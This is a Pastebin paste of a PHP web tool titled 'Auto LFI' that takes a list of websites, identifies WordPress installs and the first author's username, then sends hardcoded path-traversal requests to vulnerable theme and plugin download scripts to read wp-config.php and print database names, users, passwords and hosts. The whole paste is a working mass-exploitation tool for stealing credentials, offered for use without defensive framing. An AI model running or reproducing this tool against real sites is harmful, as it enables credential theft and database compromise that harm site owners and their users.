Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <title>Auto LFI</title>
- <body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>© </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br>
- <form method='POST'>
- <textarea name='sites' cols='45' rows='15'></textarea>
- _______________________________________________________________
- <br><input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" value="EXECUTE" type="submit"><br><br><br>
- </form>
- <?php
- @set_time_limit(0);
- $sites = explode("\r\n", $_POST['sites']);
- foreach($sites as $site) {
- $site = trim($site);
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site");
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- $get = curl_exec($ch);
- curl_close($ch);
- if(preg_match("#WordPress (.*?)/>#", $get, $version)){
- $str = str_replace('/>', "", $version[0]);
- $str = str_replace('"', "", $str);
- $users = @file_get_contents("$site/?author=1");
- preg_match('/<title>(.*?)<\/title>/si',$users,$user);
- $wpuser = explode('|',$user[1]);
- echo " <br>_______________________________________________________________</br>";
- echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }
- $expl = array("wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php");
- foreach($expl as $exploit){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- $xp = curl_exec ($ch);
- curl_close($ch);
- if(preg_match("#DB_USER#i",$xp)){
- preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
- echo "DB_NAME:{$DB_NAME[1]}<br>";
- preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
- echo "DB_USER:{$DB_USER[1]}<br>";
- preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
- echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
- preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
- echo "DB_HOST:{$DB_HOST[1]}<br>";
- }}
- $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
- foreach($lt as $l){
- $site = "$site/$l";
- $process = curl_init($site);
- curl_setopt($process, CURLOPT_TIMEOUT, 30);
- curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
- curl_setopt($process, CURLOPT_HEADER, TRUE);
- curl_setopt($process, CURLOPT_POST, 1);
- curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
- curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
- $return = curl_exec($process);
- if(preg_match("#DB_USER#i",$return)){
- preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
- echo "DB_NAME:{$DB_NAME[1]}<br>";
- preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
- echo "DB_USER:{$DB_USER[1]}<br>";
- preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
- echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
- preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
- echo "DB_HOST:{$DB_HOST[1]}<br>";
- break;
- echo " <br>_______________________________________________________________</br>";
- }
- }
- }
- ?>
- </html>
- </body>
- </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement